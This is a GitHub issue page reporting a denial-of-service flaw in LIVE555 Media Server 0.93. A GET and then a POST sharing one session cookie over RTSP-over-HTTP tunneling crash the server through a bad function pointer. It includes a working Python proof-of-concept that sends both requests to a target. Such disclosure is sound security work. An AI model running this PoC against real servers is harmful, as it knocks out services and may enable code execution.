Skip to content

There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93. #19

Closed
@DshtAnger

Description

@DshtAnger

ISSUE DESCRIPTION

The project website : http://www.live555.com/liveMedia/

I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.

I only need to send two HTTP requests in one TCP connection.

The problem occurrs in RTSPServer.cpp:853 , it calls handleHTTPCmd_TunnelingPOST.

If I send a HTTP GET packet with a specific sessionCookie firstly, then I send a HTTP POST packet with this sessionCookie in the same TCP connection.

RTSPServer will call a error virtual function pointer in readSocket function(GroupsockHepler.cpp) and the pointer value comes from heap which may control.

Attack PoC python code:

from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554  # or 8554

tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))

http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''

http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

tcp.send(http_request_GET)
data = tcp.recv(1024)

tcp.send(http_request_POST)
tcp.close()

You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.

Original vulnerability discoverer:
许彬彬 Xubinbin

IMPACT

It will cause dos attack and potential remote command execution in version 0.93(I verified) , even all earlier versions (This is just my unverified guess).

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions